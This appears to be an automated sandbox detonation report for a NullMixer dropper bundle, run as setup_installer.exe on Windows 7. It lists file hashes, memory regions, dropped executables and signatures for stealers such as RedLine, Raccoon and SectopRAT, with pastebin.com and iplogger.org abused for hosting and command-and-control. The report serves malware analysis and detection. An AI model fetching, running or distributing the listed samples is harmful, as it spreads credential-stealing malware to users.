C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2600-52-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2600-182-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2600-181-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3152-172-0x0000000000400000-0x0000000002DAA000-memory.dmp

memory/2600-180-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2600-173-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2600-179-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2600-178-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3664-188-0x0000000007730000-0x0000000007762000-memory.dmp

memory/3664-201-0x0000000007820000-0x00000000078C3000-memory.dmp

memory/840-214-0x0000000007AC0000-0x0000000007ADA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed09e3a07534aa.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4180-223-0x0000000005640000-0x000000000567C000-memory.dmp

memory/3664-224-0x0000000007D30000-0x0000000007DC6000-memory.dmp

memory/4180-222-0x0000000005710000-0x000000000581A000-memory.dmp

memory/3664-225-0x0000000007CC0000-0x0000000007CD1000-memory.dmp

memory/840-238-0x0000000007CF0000-0x0000000007CFE000-memory.dmp

memory/4180-221-0x00000000055E0000-0x00000000055F2000-memory.dmp

memory/3664-239-0x0000000007D00000-0x0000000007D14000-memory.dmp

memory/3664-240-0x0000000007DF0000-0x0000000007E0A000-memory.dmp

memory/840-247-0x0000000073710000-0x0000000073EC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Fbu1EQ9.~I

MD5 b1c69eec40db9d006f8b4df8ac3c038e
SHA1 4fc32d07029329e1e6c374b6af8d1925b1f64546
SHA256 5472aecb24e88b33c5455b9fe0617db16e2ced8016c4655a01c2eb44341671e5
SHA512 e7b4abc277c7901713f33285df92d64d26d1327943f775faf9d353401bafb7b0c9dff1ef519771bd417eec85155f9eeff74fb22976595d0e6d3472b6d17e3f9d

C:\Users\Admin\AppData\Local\Temp\RarSFX1\nPI8.L

MD5 e99d5f78660e8ea9d09045c7f1cba42c
SHA1 43ab1072c97572f4e8caefdcbe2d5aa211fd3087
SHA256 3ab51aa79dc557f84729de1001f2ade7bd3900a3a953045de76124aa5e989b98
SHA512 01fc6d11d6a70b352a89f27357323fd3c4b5d93bf3e6a5ee57ba0fa497b2c2665dd33dd0791a85db718debfc88b0b5a44c123964d2460f73e5caf8128b79b831

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Y2Yadq.8~

MD5 6acc22b9c1abe535c6feac6a79db1a18
SHA1 eb94c578b2e6c1bae8a75027f08dcf513e8fb1b9
SHA256 e3870b1f5a9c3be9041d873253e6b0bd89c3fcf05a1a8469ac0e900bc49976ef
SHA512 f99cdc1ff6bb82f73de85144b5be359b661f4bb820f3763d80314357fb7eb5fba812a0d055242e84f14381c4db4caa8fea461782e406e60685082cb8d8e06adf

memory/2112-261-0x0000000003060000-0x00000000031BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_ENU.W

MD5 13d4be61d9d3c7da927d482b449ff09e
SHA1 57fab8c699c46ff55b74794027201210c001dd0b
SHA256 848085bcebccf4cb84fc3b87fe2d6e38b0d518713146bda312570b82148fa324
SHA512 ac59a4ff77d1d6059af0d20cc91ba9290c9f3116036dcca76bc2a8842137d1db5b5a4a988d7bd269b7072b1f136f5448e51f28bab8f105bcf9234cd471e0b378

C:\Users\Admin\AppData\Local\Temp\RarSFX1\lNOSCc5X.Dt

MD5 36fb32e67fa42636817aca7805b49800
SHA1 ae6bdd4bafe6b4a8efeb0f98ac82d1ed4ef07164
SHA256 b040b87c723d23d79034a35fdc82c1f3de3052b489bb7b63e5a505afc5cb3e56
SHA512 56ff53ce8c397867a0ad2f699d3e4441ef0695685636f702db93cb62ffc1c75d33559a92a9286c9f875f2ab2f77034579cc578da427c275c95503edaf78fc42e

C:\Users\Admin\AppData\Local\Temp\RarSFX1\490lw~.x

MD5 6ba17599a0544b52b5ea5ae9d261658f
SHA1 73637edb407d1a8cb80836b19602611cc71dcdf7
SHA256 2cfefd85953f6aab43cd102651b0a130dbefe37790fa4ca775539c497aa52168
SHA512 5a0424546eb2609128812759fc0d49491562ffdc318597d9b6ef80544fd5d9e70083c91f0313e0bb6c934c5c3201a7a4f6f662b049c543ffe3765d8c665f91c2

C:\Users\Admin\AppData\Local\Temp\RarSFX1\B0zcq1x.o

MD5 a6b49368224db5ac48fea0e7215b39d9
SHA1 7385c9cae70f58842c8337ddb038641515e71313
SHA256 fe29f2f6d0ea68365d1e4cf8dab5d6fbf3ea1683964bc1027299069251052262
SHA512 7354e6ba9e478cb40d5efbc392cc911c05b9065bb01c05dfbafaf0ac0a609a07df14b4eb7ff4f18d11022d4c767e7c356a1f9510a249b399fe6b88ed82976e03

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PUVMYbL.81

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/3664-248-0x0000000073710000-0x0000000073EC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fe147adf3e5ed555b843fff0fa29ab8a
SHA1 1cdf42b7f835e19466b52b981e6677804895b99b
SHA256 8cd6fb1b1716316a8a0b3312e3e997eddfb0d15b2b71b57ca88ba26e95b9ce88
SHA512 d17a0ab8abdaf1f22a0e16114f621473d9a46734cc01d13778b9ba7df2bf620ddffacef2ee3f1cdfc9c9a63558937248dacd03e42acffab9f53f7064022a04f7

memory/3664-241-0x0000000007DE0000-0x0000000007DE8000-memory.dmp

memory/4180-220-0x0000000005B00000-0x0000000006118000-memory.dmp

memory/3664-219-0x0000000007B40000-0x0000000007B4A000-memory.dmp

memory/4180-215-0x0000000000400000-0x0000000000422000-memory.dmp

memory/840-213-0x0000000008100000-0x000000000877A000-memory.dmp

memory/840-200-0x000000006D130000-0x000000006D17C000-memory.dmp

memory/3664-199-0x00000000076F0000-0x000000000770E000-memory.dmp

memory/3664-189-0x000000006D130000-0x000000006D17C000-memory.dmp

memory/2112-262-0x00000000035C0000-0x0000000003666000-memory.dmp

memory/2112-264-0x0000000003670000-0x0000000003703000-memory.dmp

memory/2112-266-0x0000000003670000-0x0000000003703000-memory.dmp

memory/2112-263-0x0000000003670000-0x0000000003703000-memory.dmp

memory/3196-269-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1528-272-0x0000000000400000-0x0000000000422000-memory.dmp

memory/184-274-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3256-273-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2112-275-0x0000000003060000-0x00000000031BD000-memory.dmp

memory/2112-284-0x0000000003670000-0x0000000003703000-memory.dmp

memory/2112-285-0x0000000003710000-0x00000000044BC000-memory.dmp

memory/2112-286-0x00000000044C0000-0x000000000454C000-memory.dmp

memory/2112-290-0x0000000004550000-0x00000000045D8000-memory.dmp

memory/2112-287-0x0000000004550000-0x00000000045D8000-memory.dmp

memory/2112-291-0x0000000001020000-0x0000000001021000-memory.dmp

memory/2112-292-0x0000000001030000-0x0000000001034000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240708-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c78ded4d176ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-67S6C.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
